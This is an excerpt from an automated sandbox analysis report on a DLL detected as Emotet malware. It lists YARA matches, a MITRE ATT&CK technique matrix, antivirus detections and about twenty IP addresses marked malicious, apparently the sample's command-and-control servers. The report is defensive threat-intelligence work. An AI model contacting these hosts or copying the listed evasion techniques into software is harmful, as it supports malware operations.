                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000010.00000002.642285823.0000026DDEC40000.00000004.00000001.sdmpBinary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000010.00000002.642210089.0000026DDEC13000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.642388993.0000026DDED02000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.642236431.0000026DDEC29000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.4eb0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4bc0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4bc0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4900000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4eb0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4820000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.28a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2730000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2b90000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.28a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3f50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ae0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.2de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4da0000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4900000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ec0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4e60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4e60000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4820000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4b60000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4bc0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ca0000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2b90000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4da0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.5030000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ca0000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4b60000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ae0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4bc0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4ec0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3f50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.2de0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.5030000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.644665975.0000000004820000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.642932572.0000000002730000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645532661.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.251093887.0000000005030000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645241270.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.248189238.00000000028A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250243016.0000000002DE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250730251.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645897262.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.252637909.0000000003F50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250606997.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.644831234.0000000004900000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.251012589.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.643684713.0000000002B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645743036.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.250937948.0000000004E60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.645105513.0000000004B60000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSystem Information Discovery35SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSecurity Software Discovery51Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading2Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528565 Sample: MakbLShaqA.dll Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 40 85.214.67.203 STRATOSTRATOAGDE Germany 2->40 42 195.154.146.35 OnlineSASFR France 2->42 44 17 other IPs or domains 2->44 50 Sigma detected: Emotet RunDLL32 Process Creation 2->50 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 5 other signatures 2->56 9 loaddll32.exe 1 2->9         started        11 svchost.exe 2->11         started        14 svchost.exe 9 1 2->14         started        17 8 other processes 2->17 signatures3 process4 dnsIp5 19 rundll32.exe 2 9->19         started        22 cmd.exe 1 9->22         started        60 Changes security center settings (notifications, updates, antivirus, firewall) 11->60 24 MpCmdRun.exe 1 11->24         started        46 127.0.0.1 unknown unknown 14->46 signatures6 process7 signatures8 58 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->58 26 rundll32.exe 19->26         started        28 rundll32.exe 22->28         started        30 conhost.exe 24->30         started        process9 process10 32 rundll32.exe 26->32         started        36 rundll32.exe 28->36         started        dnsIp11 38 51.178.61.60, 443, 49759 OVHFR France 32->38 48 System process connects to network (likely due to code injection or exploit) 32->48 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MakbLShaqA.dll17%VirustotalBrowse
                      MakbLShaqA.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.rundll32.exe.4850000.5.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.27b0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.4b90000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.4ef0000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.4a30000.7.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.4b10000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.3f80000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.4cf0000.5.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.4e90000.7.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.28d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.4bf0000.11.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.4cd0000.13.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.2e10000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.41f0000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.5060000.11.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.4dd0000.15.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.4ee0000.17.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://51.178.61.60/mORDXFCTowJiEIIL0%Avira URL Cloudsafe
                      http://schemas.microft80%Avira URL Cloudsafe
                      https://51.178.61.60/10%VirustotalBrowse
                      https://51.178.61.60/0%Avira URL Cloudsafe
                      https://51.178.61.60/mORDXFCTowJiEI0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://51.178.61.60/mORDXFCTowJiEI7L0%Avira URL Cloudsafe
                      https://activity.windows.comt0%Avira URL Cloudsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://51.178.61.60/mORDXFCTowJiEItrue
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://51.178.61.60/mORDXFCTowJiEIILrundll32.exe, 00000007.00000002.643350637.0000000002941000.00000004.00000020.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000E.00000002.306010313.000002890D44E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305602622.000002890D449000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000E.00000003.305676490.000002890D442000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305653202.000002890D441000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305994082.000002890D443000.00000004.00000001.sdmpfalse
                                    high
                                    http://schemas.microft8svchost.exe, 00000019.00000002.388541947.000002854C23C000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000002.305963685.000002890D42A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305624378.000002890D45F000.00000004.00000001.sdmpfalse
                                        high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000E.00000003.305653202.000002890D441000.00000004.00000001.sdmpfalse
                                          high
                                          https://51.178.61.60/rundll32.exe, 00000007.00000002.643460255.0000000002979000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.269137604.0000000002977000.00000004.00000001.sdmptrue
                                          • 10%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000E.00000002.305994082.000002890D443000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.bingmapsportal.comsvchost.exe, 0000000E.00000002.305947613.000002890D413000.00000004.00000001.sdmpfalse
                                              high
                                              https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000002.305963685.000002890D42A000.00000004.00000001.sdmpfalse
                                                high
                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000E.00000003.305670274.000002890D457000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000E.00000002.305963685.000002890D42A000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000E.00000003.305670274.000002890D457000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://crl.ver)svchost.exe, 0000000A.00000002.538995107.00000275BC212000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.yahoo.comrundll32.exe, rundll32.exe, 00000002.00000002.251213292.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.248351593.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.252910239.0000000010056000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.646110148.0000000010056000.00000002.00020000.sdmp, MakbLShaqA.dllfalse
                                                              high
                                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305653202.000002890D441000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000019.00000003.369220229.000002854CB90000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369209327.000002854CB7F000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369173793.000002854CBA7000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369239661.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.369187106.000002854CBA7000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000E.00000002.305947613.000002890D413000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305987582.000002890D43E000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://51.178.61.60/mORDXFCTowJiEI7Lrundll32.exe, 00000007.00000002.643350637.0000000002941000.00000004.00000020.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://activity.windows.comtsvchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://%s.xboxlive.comsvchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  low
                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000E.00000002.306010313.000002890D44E000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.305602622.000002890D449000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000E.00000003.283947646.000002890D432000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://dynamic.tsvchost.exe, 0000000E.00000003.305602622.000002890D449000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305994082.000002890D443000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://disneyplus.com/legal.svchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000E.00000003.283947646.000002890D432000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.305980684.000002890D43C000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://www.tiktok.com/legal/report/svchost.exe, 00000019.00000003.369209327.000002854CB7F000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://activity.windows.comsvchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000E.00000003.305618783.000002890D461000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://help.disneyplus.com.svchost.exe, 00000019.00000003.368117861.000002854CB77000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368199872.000002854D002000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.368168723.000002854CB98000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://%s.dnet.xboxlive.comsvchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        low
                                                                                        https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000E.00000003.305631055.000002890D45A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.306018853.000002890D45B000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000E.00000003.305624378.000002890D45F000.00000004.00000001.sdmpfalse
                                                                                            high

                                                                                            Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            207.148.81.119
                                                                                            unknownUnited States
                                                                                            20473AS-CHOOPAUStrue
                                                                                            196.44.98.190
                                                                                            unknownGhana
                                                                                            327814EcobandGHtrue
                                                                                            78.46.73.125
                                                                                            unknownGermany
                                                                                            24940HETZNER-ASDEtrue
                                                                                            37.59.209.141
                                                                                            unknownFrance
                                                                                            16276OVHFRtrue
                                                                                            85.214.67.203
                                                                                            unknownGermany
                                                                                            6724STRATOSTRATOAGDEtrue
                                                                                            191.252.103.16
                                                                                            unknownBrazil
                                                                                            27715LocawebServicosdeInternetSABRtrue
                                                                                            45.79.33.48
                                                                                            unknownUnited States
                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                            54.37.228.122
                                                                                            unknownFrance
                                                                                            16276OVHFRtrue
                                                                                            185.148.169.10
                                                                                            unknownGermany
                                                                                            44780EVERSCALE-ASDEtrue
                                                                                            142.4.219.173
                                                                                            unknownCanada
                                                                                            16276OVHFRtrue
                                                                                            54.38.242.185
                                                                                            unknownFrance
                                                                                            16276OVHFRtrue
                                                                                            195.154.146.35
                                                                                            unknownFrance
                                                                                            12876OnlineSASFRtrue
                                                                                            195.77.239.39
                                                                                            unknownSpain
                                                                                            60493FICOSA-ASEStrue
                                                                                            78.47.204.80
                                                                                            unknownGermany
                                                                                            24940HETZNER-ASDEtrue
                                                                                            168.197.250.14
                                                                                            unknownArgentina
                                                                                            264776OmarAnselmoRipollTDCNETARtrue
                                                                                            51.178.61.60
                                                                                            unknownFrance
                                                                                            16276OVHFRtrue
                                                                                            177.72.80.14
                                                                                            unknownBrazil
                                                                                            262543NewLifeFibraBRtrue
                                                                                            66.42.57.149
                                                                                            unknownUnited States
                                                                                            20473AS-CHOOPAUStrue
                                                                                            37.44.244.177
                                                                                            unknownGermany
                                                                                            47583AS-HOSTINGERLTtrue
                                                                                            51.210.242.234
                                                                                            unknownFrance
                                                                                            16276OVHFRtrue

                                                                                            Private

                                                                                            IP
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                            Analysis ID:528565
                                                                                            Start date:25.11.2021
                                                                                            Start time:14:17:56
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 10m 51s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:light
                                                                                            Sample file name:MakbLShaqA.dll
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Run name:Run with higher sleep bypass
                                                                                            Number of analysed new started processes analysed:33
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.evad.winDLL@26/7@0/21
                                                                                            EGA Information:Failed
                                                                                            HDC Information:
                                                                                            • Successful, ratio: 30.4% (good quality ratio 28.3%)
                                                                                            • Quality average: 74.9%
                                                                                            • Quality standard deviation: 28.2%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 80%
                                                                                            • Number of executed functions: 0
                                                                                            • Number of non-executed functions: 0
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                            • Found application associated with file extension: .dll
                                                                                            Warnings:
                                                                                            Show All
